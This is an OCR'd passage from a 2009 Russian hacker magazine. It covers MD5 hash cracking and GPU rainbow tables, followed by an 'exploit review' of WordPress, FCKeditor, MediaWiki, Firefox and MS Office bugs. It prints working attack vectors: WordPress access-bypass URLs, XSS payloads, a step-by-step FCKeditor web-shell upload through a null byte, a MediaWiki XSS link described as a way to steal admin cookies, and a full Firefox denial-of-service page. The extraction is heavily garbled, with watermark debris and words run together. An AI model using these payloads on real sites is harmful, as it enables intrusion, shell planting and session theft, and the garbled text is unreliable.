книги хакеры / журнал хакер / 128_Optimized
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
>>
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
||||
|
- |
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
BUY |
|
|
|||
взломw |
|
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
|||||
|
|
|
|
|
|
m |
|||||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
||
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
|
-x cha |
|
|
|
|
какого-либоразработчика), будутотправленынаGoogle. Ещепример:
# настройки «allow/deny» .htaccess-файла <limit GET>
satisfy any order deny,allow deny from all
allow from 63.76.22.2 allow from 130.116.16. allow from 130.116.17.
allow from 130.116.18. allow from 130.116.19. allow from 144.110.36. require valid-user </limit>
Еслисредитвоихдрузейнайдутсятолковыепрограммисты, можешь посоветоватьсясниминатемунаписанияинжекторапакетов, гдеадрес отправителяподменялсябынавводимыйвручную. Дляэтогообязательнопонадобитсядополнение— библиотека, вродеWinpcap илиLibInject.
|
№6 |
ЗАДАЧА: МАКСИМАЛЬНОБЫСТ- |
if ($connect->content =~ /Cleartext of $hash is (.*)/) |
|
РОРАСШИФРОВАТЬMD5, ЕСЛИ |
{ |
|
|
НЕХВАТАЕТВЫЧИСЛИТЕЛЬНЫХ |
print "Result : $1\n"; |
|
МОЩНОСТЕЙУКОМПА |
} else { |
||
|
|
|
print "Result : Hash not found!\n"; |
РЕШЕНИЕ: |
|
} |
Небеда! Сломаешьбанк— купишьновыйкомп. Аеслисерьезно, длярешениязадачиможновоспользоватьсясуществующимисерверамидлявзломаизвестных криптографическиххешейонлайн. Скажем, одинизнаиболееизвестныхрусскоязычных— Hashcracking.info. Насамомделе, ихможноперечислятьдесятками, простоневсеэффективны, потомучтонаодномискомыйпарольможетбыть, ана другомнет. Дляэтогостоитвоспользоватьсяспециальнымсофтомподназванием HashSearcher. Авторсофтины— mailbrush. Программаосуществляетавтоматизированныйпоискпо15 сервисамдляMD5-крекинга. Вотнекоторыеизних: hashcracking.info, md5.rednoize.com, tmto.org, md5pass.info, milw0rm. com. Вбивайхеш, запускайпрогуиждирезультата! Еслихочешь, можешьсам попробоватьнаписатьсредствосвоимисилами. Примервзаимодействиясодним изтакихсервисовнаPerl:
$url = "http://md5.hashcracking.com/search.php?md5=$hash»; |
|
|
$lwp = LWP::UserAgent->new(); |
|
|
$lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; |
|
|
rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); |
|
|
$connect = $lwp -> get($url); |
|
|
print «md5.hashcracking.com |
---- «; |
Проспуфитьадресисточникапрощепаренойрепы! |
№7 ЗАДАЧА: СГЕНЕРИРОВАТЬБОЛЬ-
ШУЮRAINBOW TABLE, ИСПОЛЬЗУЯ GPU
РЕШЕНИЕ:
Идеяясна— тыхочешь, используямощисвоейвидеокарты, быстрее генерировать«радужныетаблицы» дляатакинакриптографические хеши, асредствадляэтогоднемсогнемненайти, потомучтосуществующиепроекты, вродеwinrtgen, работаютисключительнонамощностях процессоров. ДлявзаимодействиясGPU тебенужновоспользоваться специальноймодификацией, авторомкоторыйявляетсяZhu Shuanglei. Найтитакую(rtgen CUDA) исамосредстводлявзломаможнонасайте project-rainbowcrack.com. ТакаяжетемаестьотнашегосоотечественникаXSerg. Разберемработунапримерепервой:
# синтаксис ничем не отличается от привычной тулзы, кроме того, что тебе потребуется указать количество ядер видеокарты, которые будут задействованы в работе RainbowTableGenerate.exe md5 alpha 1 8 0 2400 40000000 xek 240
Теперьобъяснюпараметрыподробнее:
• Md5 — генерациясоответствующеготипахеша;
•alpha — толькобуквы;
•1 8 — искомыйпарольотодногодовосьмисимволов;
•0 — индекс;
•2400 40000000 — длинацепочки;
•xek — префиксдлятаблицы;
•240 — количествозадействованныхядервидеокарты. Уменя— GeForce
••GTX 280. Ихколичестворавно240 соответственно.
Дляизвестныхвидеокартпоследняяопцияданавсправочномварианте.z
Автоматизированныйпоиск |
|
кудаболееудобноезанятие, чем |
|
использованиесобственных |
РаботасCUDA пригенерации |
вычислительныхмощностейдля |
|
взломапростейшегохеша |
«радужныхтаблиц» |
XÀÊÅÐ 08 /128/ 09 |
039 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|||
|
|
X |
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
||
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
|
P |
|
|
|
|
|
NOW! |
o |
||
|
|
|
|
|
|
||||
w Click |
|
BUY |
>>m |
||||||
to |
|
|
|
||||||
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
. |
|
|
|
|
|
.c |
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
||
|
|
|
|
-xcha |
|
|
|
взлом
обзор |
обзор |
эксплоитов |
эксплоитов |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
|
обзор |
|
|
эксплоитов |
|
|
обзор |
|
|
эксплоитов |
|
МАГ (ICQ 884888) |
обзор |
|
эксплоитов |
||
/ HTTP://WAP-CHAT.RU / |
||
|
||
OBZOR ЕKSPLOITOV |
Жаркийавгустпрямо-такиплавитуставшиемозгиразработчиков. Хакерыже, наоборот, прилагаютвсебольшеибольшеусилийдляпоисказнаменательныхуязвимостейвсамыхразличныхприложениях. Вотисегодняшнийобзорпорадуетсвежимурожаембаговвтакихиз-
вестнейшихпродуктах, какWordPress, MediaWiki, Mozilla Firefox, MS Internet Explorer вместескомпонентамиMS Office, атакжевцелойкуче web cms, вкоторыхиспользуетсяWYSIWYG-редакторFCKeditor.
01НЕДОСТАТОЧНАЯПРОВЕРКА ПРИВИЛЕГИЙВWORDPRESS
>>Brief
ПоискдырвизвестнейшейблоговойплатформеWordPress становится длямногихуженепростоувлекательнымзанятием, ноисамымнастоящимхобби. ВотинаэтотразребятаизCore Security Technologies (http:// www.coresecurity.com/corelabs) обнаружили, чтодвижокнекорректно проверяетправадоступаунепривилегированныхпользователейпри просмотре(атакжередактированииисохранении) страницконфигурации самыхразличныхплагинов. Удаленныйавторизованныйпользователь можетлегковнедритьсвойXSS-кодвконфигиплагинов, атакжепросмотретьдругуючувствительнуюинформацию.
Редактированиеопцийплагиновобычнопроходитчерезсценарий ./
wp-admin/options-general.php?page=[plugin_page], вкотором спроверкойпривилегийвсенормально. Нониктонеотменялобращение напрямуюк./wp-admin/admin.php, которыйиотвечаетзаинклудплагинов. Дляпониманияуязвимостирассмотримкодэтогоскриптаподробней:
//проверка того, что страница плагина находится в своей директории ./wp-content/plugins
if (isset($_GET['page']))
{
$plugin_page = stripslashes($_GET['page']); $plugin_page = plugin_basename($plugin_page);
}
...
// Handle plugin admin pages. if (isset($plugin_page))
{
if ( validate_file($plugin_page) )
{
wp_die(__('Invalid plugin page'));
}
if (! ( file_exists(WP_PLUGIN_DIR . "/$plugin_ page") && is_file(WP_PLUGIN_DIR . "/$plugin_page") ) )
wp_die(sprintf(__('Cannot load %s.'), htmlentities($plugin_page)));
do_action('load-' . $plugin_page); //собственно, инклуд страницы плагина include(WP_PLUGIN_DIR . "/$plugin_page");
}
...
Каквидно, валидациюпроходяттолькофизическирасположенныена жесткомдискефайлыплагина. Никакихпроверокнаправадоступакним нетивпомине.
>>Targets
WordPress 2.8 иниже. WordPress MU 2.7.1 иниже.
>>Exploit
Впримереавторыприводятследующиевекторыиспользования: 1. ПросмотрконфигурацииплагинаCollapsing Archives:
http://[some_wordpress_blog]/wp-admin/admin.php?page=/ collapsing-archives/options.txt
2.Просмотринформацииобантиспам-плагинеAkismet, идущемвдефол-
тномдистрибутивевордпресса:
http://[some_wordpress_blog]/wp-admin/admin. php?page=akismet/readme.txt
3.XSS вплагинеRelated Ways To Take Action:
040 |
XÀÊÅÐ 08 /128/ 09 |
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
обзор |
обзор |
эксплоитов |
эксплоитов |
>>
обзор
эксплоитов
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
взломw |
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
||||
|
|
|
|
|
o |
m |
||||
|
w |
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
http://[some_wordpress_blog]/wp-admin/admin. php?page=related-ways-to-take-action/options.php
Дляиспользованиябагавставляемвполе«Exclude actions by term» код:
\"/><script>alert(String.fromCharCode(88)+String.
fromCharCode(83)+String.fromCharCode(83))</
script><ahref="
4.ПросмотрDashboard-плагинаWP Security Scanner:
http://[some_wordpress_blog]/wp-admin/admin. php?page=wp-security-scan/securityscan.php
5.РеконфигурацияплагинаIntrusion Detection System:
http://[some_wordpress_blog]/wp-admin/index. php?page=wp-ids/ids-admin.php
Оригинальныйтекстadvisory ищипоссылкеhttp://milw0rm.com/ exploits/9110.
>> SOLUTION
Самымлучшимрешениемдляустраненияуязвимостибудетобновление своегоблогадопоследнейверсии, представленнойнаwordpress.com (на данныймомент— 2.8.1).
02ЗАГРУЗКАПРОИЗВОЛЬНЫХ ФАЙЛОВВFCKEDITOR
>> Brief
FCKeditor, нарядусTinyMCE, являетсяоднимизнаиболеераспространен- ныхWYSIWYG-редакторовииспользуетсявтакихизвестныхWEB-прило-
женияx, какZope, PHPList, Falt4 CMS, RunCMS, Dokeos, Nuke ET.
ДляэтойуязвимостивСетиприсутствуюточеньскудныеописания, из которыхпонятнотолькото, чтоуязвимпараметр«CurrentFolder» (напри-
мер, www.securitylab.ru/vulnerability/382191.php иwww.securityfocus. com/bid/31812). Таккактакоеположениеделменявовсенеустраивало, пришлосьсамомупокопатьсявисходникахописываемогоHTML based редактора.
Итак, качаемпоследнийуязвимыйрелиз(http://dfn.dl.sourceforge.net/ sourceforge/fckeditor/FCKeditor_2.6.4.zip) иоткрываемсценарий, ответст-
венныйзаupload файловвовстроенномфайлменеджерескрипта— ./ editor/filemanager/connectors/php/upload.php:
<?php
...
$sCurrentFolder = GetCurrentFolder() ;
// Is enabled the upload?
if ( ! IsAllowedCommand( $sCommand ) )
ДОМАШНЯЯСТРАНИЦАПРОЕКТАMEDIAWIKI
SendUploadResults( '1', '', '',
'The ""' . $sCommand .'"" command isn\'t allowed' ); // Check if it is an allowed type.
if ( !IsAllowedType( $sType ) ) SendUploadResults( 1, '', '',
'Invalid type specified' );
FileUpload( $sType, $sCurrentFolder, $sCommand ) ?>
Здесьнасинтересуетфункцияопределениятекущейдиректории— GetCurrentFolder(), найтикоторуюмысможемвсценарии./editor/ filemanager/connectors/php/io.php:
function GetCurrentFolder()
{
if (!isset($_GET)) { global $_GET;
}
$sCurrentFolder = isset( $_GET['CurrentFolder'] )? $_GET['CurrentFolder'] : '/' ;
// Check the current folder syntax (must begin and start with a slash).
if ( !preg_match( '|/$|', $sCurrentFolder ) ) $sCurrentFolder .= '/' ;
if ( strpos( $sCurrentFolder, '/' ) !== 0 ) $sCurrentFolder = '/' . $sCurrentFolder ;
// Ensure the folder path has no double-slashes while ( strpos ($sCurrentFolder, '//') !== false )
{
$sCurrentFolder = str_replace ( '//','/', $sCurrentFolder) ;
}
// Check for invalid folder paths (..) if ( strpos( $sCurrentFolder, '..' ) ||
strpos( $sCurrentFolder, "\\" )) SendError( 102, '' ) ;
return $sCurrentFolder ;
}
Атакжефункция, собственно, загрузкиисохраненияфайловFileUpload()
из./editor/filemanager/connectors/php/commands.php:
function FileUpload(
$resourceType, $currentFolder, $sCommand )
{
...
//Map the virtual path to the local server path. $sServerDir = ServerMapFolder($resourceType,
$currentFolder, $sCommand ) ;
//Get the uploaded file name.
$sFileName = $oFile['name'] ;
$sFileName = SanitizeFileName( $sFileName );
...
$sFilePath = $sServerDir . $sFileName ;
ЧИТАЕМAKISMET/README.TXT ЧЕРЕЗБАГУВWORDPRESS
XÀÊÅÐ 08 /128/ 09 |
041 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
|
|
P |
|
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
>>m |
|
|||
w Click |
to |
|
|
|
взлом |
|||||
|
|
|
|
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
обзор |
обзор |
эксплоитов |
эксплоитов |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
X |
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
||
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
BUY |
|
|
|||
обзор |
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
w |
|
|
|
|
|
|
|
|
m |
||
|
w Click |
|
|
|
|
|
|
||||
эксплоитов |
|
|
|
|
|
o |
|
||||
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
|
-x cha |
|
|
|
|
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
CALC.EXE, ВЫЗВАННЫЙЧЕРЕЗПЕРЕПОЛНЕНИЕВFIREFOX’Е
...
move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
...
}
ФункцияServerMapFolder() простовозвращаетполныйfolder path на сервере, исходяизпереданногопараметра$currentFolder. Каквидно изфункцииGetCurrentFolder(), имяуказываемойпользователемпапки проверяетсятольконаналичиеуязвимостиdirectory traversal, ноникакне набанальныйnull-byte.
>>Exploit
Длянаглядногопримераэксплуатациивоспользуемсявстроенным тестовымстендомFCKeditor длязагрузкифайлов— ./editor/filemanager/ connectors/uploadtest.html.
Итак, всписке«Select the File Uploader to use» выбираемPHP (ну, или любойдругойпонравившийсятебеконнектор), далеевформе«Upload a new file» выбирайсвойшелл, сохраненныйсрасширением.txt и, наконец,
вполе«Current Folder» вбивайчто-товроде«my-evil-shell.php%00».
Теперь, послесабмитазаполненнойформы, скриптсрадостьюпокажет адрествоегозагруженногошеллавполе«Uploaded File URL» (вмоем случаеэто./userfiles/test.php).
Каквидноизпримера, $sFilePath дляmove_uploaded_file() становится равнымименидиректории($sServerDir), настоящеежеимяфайла ($sFileName) просто-напростоотбрасываетсянулл-байтом.
>>Targets:
FCKeditor <=2.6.4, атакжевсеweb cms, вкоторыхиспользуетсяэтот
WYSIWYG-редактор.
>> Solution
Каквсегда, наилучшимрешениемдлязакрытияуязвимостибудетустановкапоследнейверсиискриптассайтапроизводителя— http://www. fckeditor.net.
03МЕЖСАЙТОВЫЙСКРИПТИНГВ
MEDIAWIKI
>>Brief
Да-да! ВдвижкеMediaWiki, которыйиспользуетсяВеликойиУжасной
УСПЕШНАЯЗАГРУЗКАШЕЛЛАВFCKEDITOR
Википедиейимножествомдругихвики-сайтов, некийAmalthea 13 июля сегогоданашелзамечательнуюXSS-уязвимость.
Багаприсутствуетвфайле./includes/specials/SpecialBlockip.php ипроявляетсянастраницеsite.com/index.php/Special:Block.
Итак, рассмотриммеханизмдействияподробнее:
<?php
...
class IPBlockForm
{
...
function IPBlockForm( $par )
{
global $wgRequest, $wgUser, $wgBlockAllowsUTEdit;
// получаем значение wpBlockAddress из массива $_REQUEST $this->BlockAddress = $wgRequest->getVal(
'wpBlockAddress', $wgRequest->getVal( 'ip', $par ) ); $this->BlockAddress = strtr(
$this->BlockAddress, '_', '' );
...
}
...
//функция для отображения элементов html-страницы function showForm( $err )
{
...
$user = User::newFromName( $this->BlockAddress );
...
// отображаем полученное
значение wpBlockAddress в веб-форме Xml::input( 'wpBlockAddress', 45,
$this->BlockAddress, array(
ВНЕШНИЙВИДFCKEDITOR
042 |
XÀÊÅÐ 08 /128/ 09 |
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
обзор |
обзор |
обзор |
эксплоитов |
эксплоитов |
эксплоитов |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
X |
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
||
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
>> взломw Click |
|
BUY |
|
|
|||||||
to |
|
|
|
|
m |
||||||
обзор |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
||
эксплоитов |
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
|
-x cha |
|
|
|
|
CALC.EXE,ВЫЗВАННЫЙПЕРЕПОЛНЕНИЕМACTIVEX КОМПОНЕНТАВIE
ДЕМОНСТРАЦИЯРАБОТЫTUN KERNEL ЭКСПЛОЙТА
DENIAL OF SERVICE ВMOZILLA FIREFOX
'tabindex' => '1', 'id' => 'mw-bi-target',
'onchange' => 'updateBlockOptions()' ) ). " </td>
</tr>
<tr>"
);
...
}
...
?>
ПеременнаяwpBlockAddress (азатеми$thisÆBlockAddress) нигдеини-
коимобразомнефильтруется, такчтонамостаетсялишьграмотнозаюзать этотзамечательныйфакт.
>>Exploit
Использоватьописаннуюуязвимостьмежсайтовогоскриптинганеобычайнопросто. Достаточнолишьскормитьадминистраторуилилюбому другомупривилегированномуучастникуВики-порталассылкувида:
http://site.com/index.php/Special:Block/?wpBlockAddre ss="/><script>alert('Privet! Ya MegaXSS :)')</script><a href="
ЕслиэтобудетXSS соссылкойнатвойснифер, тоавторизационныекукисыадминистратораблагополучноокажутсяутебя.
>>Targets
УязвимысразудвеветкиMediaWiki: MediaWiki <= 1.14.0
MediaWiki <= 1.15.0
>> Solution
Какобычно, незабываемпроверятьналичиесвежейверсиидвижкана сайтепроизводителя— mediawiki.org/wiki/Download.
04ПОВРЕЖДЕНИЕПАМЯТИВMOZILLA FIREFOX
>>Brief:
Чемпопулярнейстановитсясофт, тембольшеэнтузиастовнаходятвнем уязвимости. ПечальнымпримеромслужитнетакдавновышедшийFirefox 3.5, гденекийSBerry aka Simon Berry-Byrne нашелзамечательнуюбагу переполнениякучи, спомощьюкоторойзлоумышленникможетвыполнитьпроизвольныйкоднацелевойсистеме.
ПроблемазаключаетсявошибкевJust-in-Time (JIT, компиляторенового движкаJavaScript дляОгнелиса): приобработкеJavaScript’омнекоторых теговHTML (например, font) компиляторнекорректновозвращаетданные изсобственныхфункций, такихкакescape().
Кстати, темжеавтором, новсоавторствесAndrew Haynes быланайдена иещеоднопереполнение(теперьужевызывающееDenial of Service) в
свежемфайрфоксе— Mozilla Firefox 3.5 Unicode Data Remote Stack Buffer Overflow Vulnerability. Наэтотразбагазаключаетсявнекорректнойобра- боткедлинныхunicode-последовательностейвметодеwrite вышеозначенногодвижкаJS.
>>Targets
Firefox 3.5 и, возможно, болееранниеверсии.
>> Solution
Завсемиsecurity-апдейтамидляОгнелисаобращайсяпоадресуmozilla. com/firefox.
>> Exploit:
Дляпервогопереполненияавторпредоставляетнамвпользование неплохойPoC (http://milw0rm.com/exploits/9137), запускающийнатвоей машинеприложениеcalc.exe, адлявторогодостаточнолишьнакидать небольшойhtml-примерсиспользованиемjavascript:
<html>
<head>
<script language="JavaScript" type=»Text/Javascript"> var str = unescape("%u4141%u4141");
var str2 = unescape("%u0000%u0000");
XÀÊÅÐ 08 /128/ 09 |
043 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
|
|
P |
|
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
>>m |
|
|||
w Click |
to |
|
|
|
взлом |
|||||
|
|
|
|
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
обзор |
обзор |
эксплоитов |
эксплоитов |
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
X |
|
|
|
|
|
||||
|
|
- |
|
|
|
|
|
d |
|
|||
|
|
F |
|
|
|
|
|
|
t |
|
||
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
BUY |
|
|
|||
обзор |
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
w |
|
|
|
|
|
|
|
|
|
m |
||
|
w Click |
|
|
|
|
|
|
|||||
эксплоитов |
|
|
|
|
|
o |
|
|||||
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
|||
|
|
|
p |
|
|
|
|
g |
|
|
||
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
|
|
-x cha |
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
зор
сплоитов
XSS ВПЛАГИНЕRELATED WAYS TO TAKE ACTION
var finalstr2 = mul8(str2, 49000000); var finalstr = mul8(str, 21000000); document.write(finalstr2); document.write(finalstr);
function mul8 (str, num) {
var i = Math.ceil(Math.log(num) / Math.LN2), res = str;
do {
res += res; } while (0 < --i);
return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>
Невызывающаяподозренийфункцияwrite() должна, поидее, вывестина экраноченьдлинныепоследовательностиunicode-символов. Новместо этогоFirefox зависнетистанеткушатьочень-оченьмногопамяти(такчто насвоеймашинетеститьсплойткрайненерекомендую).
05 ВЫПОЛНЕНИЕПРОИЗВОЛЬНОГО КОДАВMICROSOFT OFFICE WEB COMPONENTS SPREADSHEETACTIVEX
КОМПОНЕНТЕ
>>Brief:
Мелкомягкиескаждымднемвсебольшеибольшенасрадуют. Наэтотраз вполезренияпопалсплойтподосликаIE, основанныйнауязвимостив
Microsoft Office Web Components Spreadsheet ActiveX. СейславныйActiveX
компонентиспользуетсябраузеромInternet Explorer дляотображения электронныхтаблицExcel. Самабага, собственно, заключаетсявошибке припроверкеграницданныхвметодеmsDataSourceObject() вэтом компоненте(OWC 10 иOWC11). Приэксплуатацииуязвимости(например, спомощьювсемизвестногометодасiframe) злоумышленниклегкоможет вызватьпереполнениестекаивыполнитьпроизвольныйкоднацелевой системе. Инымисловами, еслитыиспользуешьвкачествебраузераIE, атакженатвоемкомпьютереприсутствуетнебезызвестныйMS Office, то твоясистемаподверженаопасности.
>> Exploits
Сразутривариацииэксплойтаподописаннуюбагутыможешьнайтипо адресуhttp://www.securitylab.ru/vulnerability/382430.php.
Такжедляуспешнойэксплуатацииуязвимостивтвоембраузередолжен бытьразрешенActiveX, вчастности, объекты«OWC10.Spreadsheet» и «OWC11.Spreadsheet».
>> Targets:
•Microsoft Office XP Service Pack 3;
•Microsoft Office 2003 Service Pack 3;
•Microsoft Office XP Web Components Service Pack 3;
•Microsoft Office Web Components 2003 Service Pack 3;
•Microsoft Office 2003 Web Components for the 2007 Microsoft Office system Service Pack 1;
•Microsoft Internet Security and Acceleration Server 2004 Standard Edition Service Pack 3;
•Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition Service Pack 3;
•Microsoft Internet Security and Acceleration Server 2006;
•Internet Security and Acceleration Server 2006 Supportability Update;
•Microsoft Internet Security and Acceleration Server 2006 Service Pack 1;
•Microsoft Office Small Business Accounting 2006.
>> Solution:
Каквсегда, Microsoft неторопитсяисправлятьсвоиграбли. Вкачестве временноймерыдляисправленияуязвимостирекомендуетсядеактивироватьследующиеCLSID:
{0002E541-0000-0000-C000-000000000046} {0002E559-0000-0000-C000-000000000046}
06 ПОВЫШЕНИЕПРИВИЛЕГИЙ ВЯДРЕLINUX
>>Brief:
